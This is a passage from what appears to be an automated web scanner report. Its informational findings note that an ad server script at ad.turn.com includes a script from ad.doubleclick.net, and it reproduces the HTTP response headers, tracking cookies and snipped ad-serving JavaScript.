makJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK07OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq29STFT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGp4OSJWgeI3Ow76nnBboeSngJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUq3c3PCvX0K0pCDfAY7KB6rh-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EsQJZTKOtMP9Ca7gcv2lCqRVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA3FI1v0pIp1Oq279aEkk1j6WhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64WhzPlVze60NJNLk_VPM-uAvhIyyKReEJO7XhpyT2HyIjDPzDEEzts25-A_eYUS74d88E5NxpHVycir8QBFmIqyIxNLNbqy6vHlykIVOX3LklZBgm0y1exivcb_gfhBEDWb6jHmyzw4IbjqaiC8Out2XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUzrmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:10 GMT; Path=/
Set-Cookie: fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:10 GMT; Path=/
Set-Cookie: pf=Mgovx84h_Ov--Xj3--F0rsLmce8wzSDXw3BvrEZAKNiJwV9kSIzX4BtZ7vBDkFqivBHW9RKwIdLIwhhMny1M2H4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:10 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:55:09 GMT
Content-Length: 10132

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
if (this.width
...[SNIP]...
%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.5;abr=!ie;sz=300x250;ord=7951675187229449762?;click=http://r.turn.com/r/tpclick/id/Il4Z-HMGWm5UNwUAbAABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;">\n</SCRIPT>
...[SNIP]...

18.29. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.4;abr=!ie;sz=728x90;ord=7045426855259476565?;click=http://r.turn.com/r/tpclick/id/VRK9hmVixmGm1AAAcwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Sun, 30 Jan 2011 23:04:23 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 23:04:23 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=jD3N2bWA3-mOnaHNbq6oGr6gUOClkrpfUMKANQ1vhXPfaqaDzVRu9ZiuBStYaftYCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rgpegjWK4MWwom9unlgMhLXNsCCEbhAsIdsy3zCFGHpw37eq4Z01Gip7C0qED-uDRXnxqTFGB1N4YMlWXm_-MaJLf6A30j8d5gU8-mc72wOIKQrupC4PpJl2uCWF8C-Ug5zE4ga4uSsEjChAQfwWw36Y_OeXGaHeEWZpxqUmyoO4aEqzrlzsjMft3cRcjGnFvni7gawmV97meEG2o8pgUTMVUvCEsZdhQvkMaGDNXRUK841wLk2GYSRC0x3BEve4S431p3A6UMJjebe8drcGsyS5Eq2u8SK-4v0nTmoUt_kkk_bc2bQTBpOPgQ2rj-z4cSfohDo4-tul6_WuD8j0eMjE2VTyWMB9aQAFw797l12xcGDwUqNo5bwBfJavyMoCpVVDlIJowEL2ZJ7bbw_gCtmttGfpE3WazmTpUKWPgdm0Kwwwjl5KiXaen7PpuSxadNSxUp_78PaBWAnqowBUtUuPveIf8j2XY661VgXz9vKrzqd_vJWEpaVGIPem0izQ6aKPrXTIbISjLdU8fmF4gcunvuhdFJQJil2xKmTz50dp7i0E4C4fIPULOO-1bgvNyH-_A6E1_jJbRC0RAQnnmoZNIbl1VrG-a9_rw-zAW2lAwi3YZykxvivNDVu_wiJ-nzpgcqiBETfVCgh6rOLqPGrJHyerevXy89jQMS63zyiKqQrupC4PpJl2uCWF8C-Ug7zI1PJlsg4JH93UKg4p8Y5067axWP77CNDdpZKPWLlSzacm4a-crF0dpacRlQXSurFgJILRn7aDAZTiRRTDpAMVUvCEsZdhQvkMaGDNXRUKxEQUIAYpp-QbAJrP1iB52HqzZ3gkHjNDLavV-i2IDmnKA5Q2hyGLZzy7yP9IhZH9vIPUpju1It7TH_4ufsTy9mfohDo4-tul6_WuD8j0eMjgn3JqGWHn99L8yAc1t0CrMGDwUqNo5bwBfJavyMoCpW5NWAkI-bj2WEMdrQi7smJSD2PyHt-rGJGOJ3lCDBJu6wwwjl5KiXaen7PpuSxadNrWfCFeAmfYB9wvbNyX_HcPveIf8j2XY661VgXz9vKr9c4SMN31V96MWZ_Nbkosfv4Z9eHEmOCw9cZ5JxzVrlAnvuhdFJQJil2xKmTz50dpwLpSN-3LiOu9Vp7WBoDgFL-_A6E1_jJbRC0RAQnnmoZSXWXL95Hb45PXD4y2tHukLgWjDXsTUeTWd5tj4qNaDiJ4nBZ8RXPuIpJnusA91x86GC4mLEfJ2sljTHmzwZbAY_Lh2Ugi8mvJG633sZOiSP-EXc_UXFWP7mPaqhTNB2_pCu6kLg-kmXa4JYXwL5SDkn2PegxRqM5mRRNvuUuPQYa2L50HxvswuEv77HCRTvK8NG6w8lsq_gxT4zTpoxnW4XDDwtPU5vElBnBkAq9aTtVS8ISxl2FC-QxoYM1dFQrRidyFCOVEUccMTneL2wPB2akJ6Zxx4MaHG4qowJX52eEsNCVznntZWR3U7tjmpSZjO1tJ8qK8UAy-VKR7Q8r4Z-iEOjj626Xr9a4PyPR4yOY4aAiwQlqVTaDNmxm60K7wYPBSo2jlvAF8lq_IygKlaFm_ARvcAKoZH-AIv62HmLHlgdVIiUBy9FQ0RyPwh-_rDDCOXkqJdp6fs-m5LFp08ZtWn1dPsjZXR0HI6ZwQiQ-94h_yPZdjrrVWBfP28qvqcQn-qKG1Gb1Z9AhVjY5XByMOV9_koeB1I57EmsQtHqbnNLg8Qx7fq0wYdnvZy7Y32feEuljMvvhciAahuPk0P78DoTX-MltELREBCeeahnJarbE4M_xRXSdcI4iMbNNITjgnthAiWrbbf30tKcRFHS__DAzsh0vKgYK4DlknsYsTXzTIe6cvP8Fgp6v0iG1pCu6kLg-kmXa4JYXwL5SDnCxFISzUKJrnz8NWtmYNBgbnCbJPSsHs0iOvX6zYZZ441JwlocRM-1StCCQK60MTAivtkH0XcIkoBkuY7jUSFZVS8ISxl2FC-QxoYM1dFQrFMPrYvz2Ts1Ij_XSz-xv_NWGImt49pAB5RbCmhGeBVfK2_lUCO-ofMYaBVz1MsW3qBtHiSDSYD2cppR2YtGNYJ-iEOjj626Xr9a4PyPR4yPVhnlIkVgFWAUsSjI0os5awYPBSo2jlvAF8lq_IygKlcymYwSoiOeW4YEq5c_wtcPOvPQvhLJNbC2RmtNyUVddQ_F7c57KXIm9M4O-4Hye-wueocyz5z4Zh4_TTFn-uAowvSXZHGSyvtzgTZp8tkHW1Lph5MNqkh8XeX6MytKBTrzG1aXCqxVf5nZAA7HLfYwHFS74pGVX6R7fIB4_ENcKBxUu-KRlV-ke3yAePxDXCgcVLvikZVfpHt8gHj8Q1woHFS74pGVX6R7fIB4_ENcKkJ7WkZl4NM0k2bFXusY9VItRHAs1DGSp43CQgKuilTWLURwLNQxkqeNwkICropU1i1EcCzUMZKnjcJCAq6KVNe4dObEIMtKsHRmogbr3003uHTmxCDLSrB0ZqIG699NN7h05sQgy0qwdGaiBuvfTTe4dObEIMtKsHRmogbr3002Ul8WnhGx-5A8JgMe8wN1plJfFp4RsfuQPCYDHvMDdaTzS0erQLm3C2K0qtVlbCNOT8XToW0yxZ3rNQFHzVErUUFo10m1vdQ1esR0Vej5o2VBaNdJtb3UNXrEdFXo-aNlQWjXSbW91DV6xHRV6PmjZiM7S8Ta6ZVi8L44nt5Lbx_VtNJu5mSi-Do8DnZc8Z5lgZTgyDxl-p9HfhLxfMdBCgGuqQYTxk1W2ZXZk9Fbu2FD6CgQVbZgEbhsoT18Qyzhw7W5j5_klUHK2cIyCgrVuHA0g_1_zvhzGxm5cQYKDYoCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgJ4GX4OjUVNjX2CulbPhbbQ6QSLK4RiJR_RkawdJ2DWG8nWnpcW2PqfBIM0QT5xSvI67q-6Y9u6ozlXnWk2Vqae3zeygEkfAxz0LdLPYjcint83soBJHwMc9C3Sz2I3IE2wSFrg3YhUxrd13SPf4zdk0py110jTFeWakVDqJkX2L9hnORGvmj8mxjNocqMdc8PVvEcs62kDyw4j4Ti-ngvD1bxHLOtpA8sOI-E4vp4Lw9W8RyzraQPLDiPhOL6eC8PVvEcs62kDyw4j4Ti-ngur7bsp5Fvhi44QSuDqR21RI-fooknOV-tsJXjS2yRhbSPn6KJJzlfrbCV40tskYW0j5-iiSc5X62wleNLbJGFtI-fooknOV-tsJXjS2yRhbPg2v6FqwK2qGH2NT2HwC2T4Nr-hasCtqhh9jU9h8Atk-Da_oWrAraoYfY1PYfALZ9KcqOJj5P-El2YxOi1A-SJzgRA1_Lhfy9FvJaW7uwAuc4EQNfy4X8vRbyWlu7sALnOBEDX8uF_L0W8lpbu7ACykgbtzLVWjLpGASKeaSS94; Domain=.turn.com; Expires=Wed, 27-Jul-2011 23:04:23 GMT; Path=/
Set-Cookie: fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; Domain=.turn.com; Expires=Wed, 27-Jul-2011 23:04:23 GMT; Path=/
Set-Cookie: pf=DDphSjcGk-rcs3g8uiJ3tdVnoSLgvd8DzizssL9FyFKJwV9kSIzX4BtZ7vBDkFqigSFYvDNduS7kxw0buCFgeX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Wed, 27-Jul-2011 23:04:23 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 23:04:23 GMT
Content-Length: 10126

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
if (this.width
...[SNIP]...
8%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.4;abr=!ie;sz=728x90;ord=7045426855259476565?;click=http://r.turn.com/r/tpclick/id/VRK9hmVixmGm1AAAcwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;">\n</SCRIPT>
...[SNIP]...

18.30. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.4;abr=!ie;sz=728x90;ord=3636088819337780094?;click=http://r.turn.com/r/tpclick/id/fttlMIT7dTL47AUAbwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 31 Jan 2011 01:55:09 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:09 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=CzaUagyzJtSBLjsy0u3haSAZPNitScPvnSLF6fMgMZffaqaDzVRu9ZiuBStYaftYCBsZxoRT6EzfAaBOxC9wKT4Z56e4E96NaNZjC_AOT217oTThsnNqViHEtNUDKqf-OEq2AfRSlzTnZwWXTHks0QZw0eRZgpytzjhC6uPoirkbo99Ly4MRp-sHvVRtMw0mxBBAcu5l3b38_4JJMshXQH7eq4Z01Gip7C0qED-uDRXnxqTFGB1N4YMlWXm_-MaJLf6A30j8d5gU8-mc72wOIKQrupC4PpJl2uCWF8C-Ug5zE4ga4uSsEjChAQfwWw36Y_OeXGaHeEWZpxqUmyoO4aEqzrlzsjMft3cRcjGnFvni7gawmV97meEG2o8pgUTMVUvCEsZdhQvkMaGDNXRUK841wLk2GYSRC0x3BEve4S431p3A6UMJjebe8drcGsyS5Eq2u8SK-4v0nTmoUt_kkk_bc2bQTBpOPgQ2rj-z4cSfohDo4-tul6_WuD8j0eMjE2VTyWMB9aQAFw797l12xcGDwUqNo5bwBfJavyMoCpVVDlIJowEL2ZJ7bbw_gCtmttGfpE3WazmTpUKWPgdm0Kwwwjl5KiXaen7PpuSxadNSxUp_78PaBWAnqowBUtUuPveIf8j2XY661VgXz9vKrzqd_vJWEpaVGIPem0izQ6aKPrXTIbISjLdU8fmF4gcunvuhdFJQJil2xKmTz50dp7i0E4C4fIPULOO-1bgvNyH-_A6E1_jJbRC0RAQnnmoZNIbl1VrG-a9_rw-zAW2lAwi3YZykxvivNDVu_wiJ-nzpgcqiBETfVCgh6rOLqPGrJHyerevXy89jQMS63zyiKqQrupC4PpJl2uCWF8C-Ug7zI1PJlsg4JH93UKg4p8Y5067axWP77CNDdpZKPWLlSzacm4a-crF0dpacRlQXSurFgJILRn7aDAZTiRRTDpAMVUvCEsZdhQvkMaGDNXRUKxEQUIAYpp-QbAJrP1iB52HqzZ3gkHjNDLavV-i2IDmnKA5Q2hyGLZzy7yP9IhZH9vIPUpju1It7TH_4ufsTy9mfohDo4-tul6_WuD8j0eMjgn3JqGWHn99L8yAc1t0CrMGDwUqNo5bwBfJavyMoCpW5NWAkI-bj2WEMdrQi7smJSD2PyHt-rGJGOJ3lCDBJu6wwwjl5KiXaen7PpuSxadNrWfCFeAmfYB9wvbNyX_HcPveIf8j2XY661VgXz9vKr9c4SMN31V96MWZ_Nbkosfv4Z9eHEmOCw9cZ5JxzVrlAnvuhdFJQJil2xKmTz50dpwLpSN-3LiOu9Vp7WBoDgFL-_A6E1_jJbRC0RAQnnmoZSXWXL95Hb45PXD4y2tHukLgWjDXsTUeTWd5tj4qNaDiJ4nBZ8RXPuIpJnusA91x86GC4mLEfJ2sljTHmzwZbAY_Lh2Ugi8mvJG633sZOiSP-EXc_UXFWP7mPaqhTNB2_pCu6kLg-kmXa4JYXwL5SDkn2PegxRqM5mRRNvuUuPQYa2L50HxvswuEv77HCRTvK8NG6w8lsq_gxT4zTpoxnW4XDDwtPU5vElBnBkAq9aTtVS8ISxl2FC-QxoYM1dFQrRidyFCOVEUccMTneL2wPB2akJ6Zxx4MaHG4qowJX52eEsNCVznntZWR3U7tjmpSZjO1tJ8qK8UAy-VKR7Q8r4Z-iEOjj626Xr9a4PyPR4yOY4aAiwQlqVTaDNmxm60K7wYPBSo2jlvAF8lq_IygKlaFm_ARvcAKoZH-AIv62HmLHlgdVIiUBy9FQ0RyPwh-_rDDCOXkqJdp6fs-m5LFp08ZtWn1dPsjZXR0HI6ZwQiQ-94h_yPZdjrrVWBfP28qvqcQn-qKG1Gb1Z9AhVjY5XByMOV9_koeB1I57EmsQtHqbnNLg8Qx7fq0wYdnvZy7Y32feEuljMvvhciAahuPk0P78DoTX-MltELREBCeeahnJarbE4M_xRXSdcI4iMbNNITjgnthAiWrbbf30tKcRFHS__DAzsh0vKgYK4DlknsYsTXzTIe6cvP8Fgp6v0iG1pCu6kLg-kmXa4JYXwL5SDnCxFISzUKJrnz8NWtmYNBgbnCbJPSsHs0iOvX6zYZZ441JwlocRM-1StCCQK60MTAivtkH0XcIkoBkuY7jUSFZVS8ISxl2FC-QxoYM1dFQrFMPrYvz2Ts1Ij_XSz-xv_NWGImt49pAB5RbCmhGeBVfK2_lUCO-ofMYaBVz1MsW3qBtHiSDSYD2cppR2YtGNYJ-iEOjj626Xr9a4PyPR4yPVhnlIkVgFWAUsSjI0os5awYPBSo2jlvAF8lq_IygKlcymYwSoiOeW4YEq5c_wtcPOvPQvhLJNbC2RmtNyUVddQ_F7c57KXIm9M4O-4Hye-wueocyz5z4Zh4_TTFn-uArmd3R-3GB_5MYwOq85GCPrroyEbUu1YcBKQ_cg-hbF8rzG1aXCqxVf5nZAA7HLfYwHFS74pGVX6R7fIB4_ENcKBxUu-KRlV-ke3yAePxDXCgcVLvikZVfpHt8gHj8Q1woHFS74pGVX6R7fIB4_ENcKkJ7WkZl4NM0k2bFXusY9VItRHAs1DGSp43CQgKuilTWLURwLNQxkqeNwkICropU1i1EcCzUMZKnjcJCAq6KVNe4dObEIMtKsHRmogbr3003uHTmxCDLSrB0ZqIG699NN7h05sQgy0qwdGaiBuvfTTe4dObEIMtKsHRmogbr3002Ul8WnhGx-5A8JgMe8wN1plJfFp4RsfuQPCYDHvMDdaTzS0erQLm3C2K0qtVlbCNOT8XToW0yxZ3rNQFHzVErUUFo10m1vdQ1esR0Vej5o2VBaNdJtb3UNXrEdFXo-aNlQWjXSbW91DV6xHRV6PmjZiM7S8Ta6ZVi8L44nt5Lbx_VtNJu5mSi-Do8DnZc8Z5mRgdipTgep3AUio_lJCnAqkyDNvm3H1NmzXXu3S3_LZiqCijYqePrBOzNVUtyBCE9w7W5j5_klUHK2cIyCgrVuHA0g_1_zvhzGxm5cQYKDYoCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgJ4GX4OjUVNjX2CulbPhbbQ6QSLK4RiJR_RkawdJ2DWG8nWnpcW2PqfBIM0QT5xSvI67q-6Y9u6ozlXnWk2Vqae3zeygEkfAxz0LdLPYjcint83soBJHwMc9C3Sz2I3IE2wSFrg3YhUxrd13SPf4zdk0py110jTFeWakVDqJkX2L9hnORGvmj8mxjNocqMdc8PVvEcs62kDyw4j4Ti-ngvD1bxHLOtpA8sOI-E4vp4Lw9W8RyzraQPLDiPhOL6eC8PVvEcs62kDyw4j4Ti-ngur7bsp5Fvhi44QSuDqR21RI-fooknOV-tsJXjS2yRhbSPn6KJJzlfrbCV40tskYW0j5-iiSc5X62wleNLbJGFtI-fooknOV-tsJXjS2yRhbPg2v6FqwK2qGH2NT2HwC2T4Nr-hasCtqhh9jU9h8Atk-Da_oWrAraoYfY1PYfALZ9KcqOJj5P-El2YxOi1A-SJzgRA1_Lhfy9FvJaW7uwAuc4EQNfy4X8vRbyWlu7sALnOBEDX8uF_L0W8lpbu7ACykgbtzLVWjLpGASKeaSS94; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:09 GMT; Path=/
Set-Cookie: fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:09 GMT; Path=/
Set-Cookie: pf=Mgovx84h_Ov--Xj3--F0rsLmce8wzSDXw3BvrEZAKNiJwV9kSIzX4BtZ7vBDkFqivBHW9RKwIdLIwhhMny1M2H4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:09 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:55:08 GMT
Content-Length: 10126

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
if (this.width
...[SNIP]...
8%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.4;abr=!ie;sz=728x90;ord=3636088819337780094?;click=http://r.turn.com/r/tpclick/id/fttlMIT7dTL47AUAbwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;">\n</SCRIPT>
...[SNIP]...

18.31. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.5;abr=!ie;sz=300x250;ord=4434400651657365963?;click=http://r.turn.com/r/tpclick/id/y0nM8eUnij0zGgUAaQABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 31 Jan 2011 01:03:23 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:03:23 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20O